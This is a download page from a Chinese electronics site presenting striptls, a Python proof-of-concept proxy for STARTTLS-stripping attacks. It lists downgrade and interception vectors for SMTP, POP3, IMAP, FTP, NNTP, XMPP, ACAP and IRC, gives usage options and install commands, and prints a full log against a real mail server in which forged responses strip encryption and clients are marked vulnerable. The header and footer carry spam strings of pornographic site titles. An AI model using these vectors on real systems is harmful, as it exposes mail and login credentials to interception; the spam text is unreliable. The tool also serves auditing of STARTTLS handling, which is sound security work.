在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

電子發(fā)燒友App

硬聲App

搜索歷史

清空
搜索熱詞
      0
      • 聊天消息
      • 系統(tǒng)消息
      • 評論與回復
      VIP于 到期 續(xù)費
      登錄后你可以
      • 下載海量資料
      • 學習在線課程
      • 觀看技術(shù)視頻
      • 寫文章/發(fā)帖/加入社區(qū)
      會員中心
      創(chuàng)作中心
      發(fā)布
      創(chuàng)作活動

      完善資料讓更多小伙伴認識你,還能領(lǐng)取20積分哦,立即完善>

      3天內(nèi)不再提示
      創(chuàng)作
      電子發(fā)燒友網(wǎng)>電子資料下載>電子資料>striptls審計代理

      striptls審計代理

      2022-05-09 | zip | 0.03 MB | 次下載 | 2積分

      資料介紹

      授權(quán)協(xié)議 CC0
      開發(fā)語言 Python
      軟件類型 開源軟件

      軟件簡介

      STARTTLS?是對純文本通信協(xié)議的擴展。它提供一種方式將純文本連接升級為加密連接(TLS或SSL),而不是另外使用一個端口作加密通信。

      striptls是一款端口剝離攻擊的POC實現(xiàn)

      SMTP

      SMTP.StripFromCapabilities?-?server?response?capability?patchSMTP.StripWithInvalidResponseCode?-?client?STARTTLS?stripping,?invalid?response?codeSMTP.UntrustedIntercept?-?STARTTLS?interception?(client?and?server?talking?ssl)?(requires?server.pem?in?pwd)SMTP.StripWithTemporaryErrorSMTP.StripWithErrorSMTP.ProtocolDowngradeStripExtendedModeSMTP.InjectCommand

      POP3

      POP3.StripFromCapabilitiesPOP3.StripWithErrorPOP3.UntrustedIntercept

      IMAP

      IMAP.StripFromCapabilitiesIMAP.StripWithErrorIMAP.UntrustedInterceptIMAP.ProtocolDowngradeToV2

      FTP

      FTP.StripFromCapabilitiesFTP.StripWithErrorFTP.UntrustedIntercept

      NNTP

      NNTP.StripFromCapabilitiesNNTP.StripWithErrorNNTP.UntrustedIntercept

      XMPP

      XMPP.StripFromCapabilities
XMPP.StripInboundTLS
XMPP.UntrustedIntercept
ACAP?(untested)
ACAP.StripFromCapabilities
ACAP.StripWithError
ACAP.UntrustedIntercept

      IRC

      IRC.StripFromCapabilitiesIRC.StripWithErrorIRC.UntrustedInterceptIRC.StripWithNotRegisteredIRC.StripCAPWithNotregisteredIRC.StripWithSilentDrop

      結(jié)果:

      -?[*]?client:?127.0.0.1-?????[Vulnerable!]?-?????[Vulnerable!]?-?????[???????????]?-?????[Vulnerable!]?-?[*]?client:?192.168.139.1-?????[Vulnerable!]?-?????[Vulnerable!]?-?????[Vulnerable!]?

      實例:

      #>?python?-m?striptls?--help????#?from?pip/setup.py#>?python?striptls?--help???????#?from?source?/?root?folderUsage:?striptls?[options]???????example:?striptls?--listen?0.0.0.0:25?--remote?mail.server.tld:25Options:
??????-h,?--help????????????show?this?help?message?and?exit??-v,?--verbose?????????make?lots?of?noise?[default]
??????-l?LISTEN,?--listen=LISTENlisten?ip:port?[default:?0.0.0.0:]
??????-r?REMOTE,?--remote=REMOTE
????????????????????????????remote?target?ip:port?to?forward?sessions?to
??????-k?KEY,?--key=KEY?????SSL?Certificate?and?Private?key?file?to?use,?PEMformat?assumed?[default:?server.pem]
??????-x?VECTORS,?--vectors=VECTORS????????????????????????????Comma?separated?list?of?vectors.?Use?'ALL'?(default)????????????????????????????to?select?all?vectors.?Available?vectors:
????????????????????????????FTP.StripFromCapabilities,?FTP.StripWithError,
????????????????????????????FTP.UntrustedIntercept,?IMAP.StripFromCapabilities,
????????????????????????????IMAP.StripWithError,?IMAP.UntrustedIntercept,
????????????????????????????NNTP.StripFromCapabilities,?NNTP.StripWithError,
????????????????????????????NNTP.UntrustedIntercept,?POP3.StripFromCapabilities,
????????????????????????????POP3.StripWithError,?POP3.UntrustedIntercept,
????????????????????????????SMTP.ProtocolDowngradeStripExtendedMode,
????????????????????????????SMTP.StripFromCapabilities,?SMTP.StripWithError,
????????????????????????????SMTP.StripWithInvalidResponseCode,
????????????????????????????SMTP.StripWithTemporaryError,?SMTP.UntrustedIntercept,
????????????????????????????XMPP.StripFromCapabilities,?XMPP.StripInboundTLS,
????????????????????????????XMPP.UntrustedIntercept?[default:?ALL]

      安裝:

      1.從pip安裝

      #>?pip?install?striptls

      2.從源安裝

      #>?setup.py?install

      示例:

      ??????????????????inbound????????????????????outbound
[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
??smtp-client???????????????????striptls????????????????????remote/target

      本地?smtp-client?->?localhost:8825?(代理) ->?mail.gmx.net:25

      審計模式:

      在特定的情況下遍歷所有協(xié)議并且跟蹤違反starttls協(xié)議的客戶端。你可以選擇按Ctrl + C來中止審核并打印結(jié)果。

      #> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
2016-02-02 22:11:56,275 - INFO ? ? -  ready.
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:21 ? , proto: ? ? FTP): 
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:21 ? , proto: ? ? FTP): 
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:21 ? , proto: ? ? FTP): 
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:143 ?, proto: ? ?IMAP): 
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:143 ?, proto: ? ?IMAP): 
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:143 ?, proto: ? ?IMAP): 
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:119 ?, proto: ? ?NNTP): 
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:119 ?, proto: ? ?NNTP): 
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:119 ?, proto: ? ?NNTP): 
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:110 ?, proto: ? ?POP3): 
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:110 ?, proto: ? ?POP3): 
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:25 ? , proto: ? ?SMTP): 
2016-02-02 22:11:56,275 - DEBUG ? ?- * added test (port:25 ? , proto: ? ?SMTP): 
2016-02-02 22:11:56,276 - DEBUG ? ?- * added test (port:25 ? , proto: ? ?SMTP): 
2016-02-02 22:11:56,276 - DEBUG ? ?- * added test (port:25 ? , proto: ? ?SMTP): 
2016-02-02 22:11:56,276 - DEBUG ? ?- * added test (port:25 ? , proto: ? ?SMTP): 
2016-02-02 22:11:56,276 - DEBUG ? ?- * added test (port:5222 , proto: ? ?XMPP): 
2016-02-02 22:11:56,276 - INFO ? ? - ]), 110: set([, ]), 143: set([, , ]), 21: set([, , ]), 119: set([, , ]), 25: set([, , , , ])}>
2016-02-02 22:12:08,477 - DEBUG ? ?-  - protocol detected (target port)
2016-02-02 22:12:08,530 - INFO ? ? -  client ('127.0.0.1', 28902) has connected
2016-02-02 22:12:08,530 - INFO ? ? -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:08,805 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:08,805 - DEBUG ? ?- 
2016-02-02 22:12:09,759 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:09,850 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,851 - DEBUG ? ?-  [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG ? ?-  [client] <= [server][mangled] '200 STRIPTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG ? ?-  [client] => [server][mangled] None
2016-02-02 22:12:09,883 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'mail FROM: size=10\r\n'
2016-02-02 22:12:09,983 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'530 Authentication required\r\n'
2016-02-02 22:12:09,992 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'rset\r\n'
2016-02-02 22:12:10,100 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'250 OK\r\n'
2016-02-02 22:12:10,116 - WARNING ?-  terminated.
2016-02-02 22:12:13,056 - DEBUG ? ?-  - protocol detected (target port)
2016-02-02 22:12:13,056 - INFO ? ? -  client ('127.0.0.1', 28905) has connected
2016-02-02 22:12:13,057 - INFO ? ? -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:13,241 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:13,241 - DEBUG ? ?- 
2016-02-02 22:12:14,197 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:14,289 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:14,304 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'STARTTLS\r\n'
2016-02-02 22:12:14,305 - DEBUG ? ?-  [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
2016-02-02 22:12:14,305 - DEBUG ? ?-  [client] => [server][mangled] None
2016-02-02 22:12:14,320 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'mail FROM: size=10\r\n'
2016-02-02 22:12:14,411 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'530 Authentication required\r\n'
2016-02-02 22:12:14,415 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'rset\r\n'
2016-02-02 22:12:14,520 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'250 OK\r\n'
2016-02-02 22:12:14,535 - WARNING ?-  terminated.
2016-02-02 22:12:16,649 - DEBUG ? ?-  - protocol detected (target port)
2016-02-02 22:12:16,650 - INFO ? ? -  client ('127.0.0.1', 28908) has connected
2016-02-02 22:12:16,650 - INFO ? ? -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:16,820 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:16,820 - DEBUG ? ?- 
2016-02-02 22:12:17,760 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:17,849 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:17,849 - DEBUG ? ?-  [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
2016-02-02 22:12:17,871 - WARNING ?-  terminated.
2016-02-02 22:12:20,071 - DEBUG ? ?-  - protocol detected (target port)
2016-02-02 22:12:20,072 - INFO ? ? -  client ('127.0.0.1', 28911) has connected
2016-02-02 22:12:20,072 - INFO ? ? -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:20,239 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:20,240 - DEBUG ? ?- 
2016-02-02 22:12:21,181 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:21,269 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:21,280 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'STARTTLS\r\n'
2016-02-02 22:12:21,281 - DEBUG ? ?-  [client] <= [server][mangled] '501 Syntax error\r\n'
2016-02-02 22:12:21,281 - DEBUG ? ?-  [client] => [server][mangled] None
2016-02-02 22:12:21,289 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'mail FROM: size=10\r\n'
2016-02-02 22:12:21,381 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'530 Authentication required\r\n'
2016-02-02 22:12:21,386 - DEBUG ? ?-  [client] => [server] ? ? ? ? ?'rset\r\n'
2016-02-02 22:12:21,469 - DEBUG ? ?-  [client] <= [server] ? ? ? ? ?'250 OK\r\n'
2016-02-02 22:12:21,485 - WARNING ?-  terminated.
2016-02-02 22:12:23,665 - WARNING ?- Ctrl C - Stopping server
2016-02-02 22:12:23,665 - INFO ? ? - ?-- audit results --
2016-02-02 22:12:23,666 - INFO ? ? - [*] client: 127.0.0.1
2016-02-02 22:12:23,666 - INFO ? ? - ? ? [Vulnerable!] 
2016-02-02 22:12:23,666 - INFO ? ? - ? ? [Vulnerable!] 
2016-02-02 22:12:23,666 - INFO ? ? - ? ? [ ? ? ? ? ? ] 
2016-02-02 22:12:23,666 - INFO ? ? - ? ? [Vulnerable!]

      除了審計模式外還有從服務端剝離starttls、無效化starttls響應、不可行的ssl鏈接(對于客戶端則是不在檢驗服務端的證書是否可信)以及XMPP的追蹤審計的功能。

      介紹內(nèi)容來自 FreeBuf黑客與極客(FreeBuf.COM)

      ?

      下載該資料的人也在下載 下載該資料的人還在閱讀
      更多 >

      評論

      查看更多

      下載排行

      本周

      1. 1山景DSP芯片AP8248A2數(shù)據(jù)手冊
      2. 1.06 MB  |  532次下載  |  免費
      3. 2RK3399完整板原理圖(支持平板,盒子VR)
      4. 3.28 MB  |  339次下載  |  免費
      5. 3TC358743XBG評估板參考手冊
      6. 1.36 MB  |  330次下載  |  免費
      7. 4DFM軟件使用教程
      8. 0.84 MB  |  295次下載  |  免費
      9. 5元宇宙深度解析—未來的未來-風口還是泡沫
      10. 6.40 MB  |  227次下載  |  免費
      11. 6迪文DGUS開發(fā)指南
      12. 31.67 MB  |  194次下載  |  免費
      13. 7元宇宙底層硬件系列報告
      14. 13.42 MB  |  182次下載  |  免費
      15. 8FP5207XR-G1中文應用手冊
      16. 1.09 MB  |  178次下載  |  免費

      本月

      1. 1OrCAD10.5下載OrCAD10.5中文版軟件
      2. 0.00 MB  |  234315次下載  |  免費
      3. 2555集成電路應用800例(新編版)
      4. 0.00 MB  |  33566次下載  |  免費
      5. 3接口電路圖大全
      6. 未知  |  30323次下載  |  免費
      7. 4開關(guān)電源設計實例指南
      8. 未知  |  21549次下載  |  免費
      9. 5電氣工程師手冊免費下載(新編第二版pdf電子書)
      10. 0.00 MB  |  15349次下載  |  免費
      11. 6數(shù)字電路基礎pdf(下載)
      12. 未知  |  13750次下載  |  免費
      13. 7電子制作實例集錦 下載
      14. 未知  |  8113次下載  |  免費
      15. 8《LED驅(qū)動電路設計》 溫德爾著
      16. 0.00 MB  |  6656次下載  |  免費

      總榜

      1. 1matlab軟件下載入口
      2. 未知  |  935054次下載  |  免費
      3. 2protel99se軟件下載(可英文版轉(zhuǎn)中文版)
      4. 78.1 MB  |  537798次下載  |  免費
      5. 3MATLAB 7.1 下載 (含軟件介紹)
      6. 未知  |  420027次下載  |  免費
      7. 4OrCAD10.5下載OrCAD10.5中文版軟件
      8. 0.00 MB  |  234315次下載  |  免費
      9. 5Altium DXP2002下載入口
      10. 未知  |  233046次下載  |  免費
      11. 6電路仿真軟件multisim 10.0免費下載
      12. 340992  |  191187次下載  |  免費
      13. 7十天學會AVR單片機與C語言視頻教程 下載
      14. 158M  |  183279次下載  |  免費
      15. 8proe5.0野火版下載(中文版免費下載)
      16. 未知  |  138040次下載  |  免費
      主站蜘蛛池模板: 国产1卡2卡三卡四卡网站 | 亚洲 欧美 精品专区 极品 | 亚洲欧美一区二区三区在线播放 | 男人的天堂久久精品激情 | 福利色播 | ww欧洲ww欧洲视频 | 明日花在线观看 | 日本aaaaa | 成人av.com| 亚洲免费毛片 | 久久艹综合 | 黄 色美 女人 | 午夜亚洲福利 | 狂野欧美激情性xxxx | 免费在线h视频 | 美女张开腿露尿口给男人亲 | 国产一级大片免费看 | 六月婷操 | 你懂的免费 | 曰本毛片 | 看草逼 | 性欧美巨大 | 日日躁夜夜躁狠狠天天 | 亚洲成人免费网站 | 亚洲视频在线视频 | 三级成人网 | 手机在线观看一级午夜片 | 开心色xxxx | 国产欧美在线一区二区三区 | 中文字幕有码在线视频 | 天天干天天干天天干天天干天天干 | 欧美婷婷色 | 亚洲一区二区中文 | 天天精品 | 欧美xxxx性特级高清 | 成人国产永久福利看片 | 国产yw855.c免费观看网站 | 日本三级免费看 | 国产在线成人一区二区 | 欧美色图狠狠干 | 狠狠色噜噜狠狠狠狠奇米777 |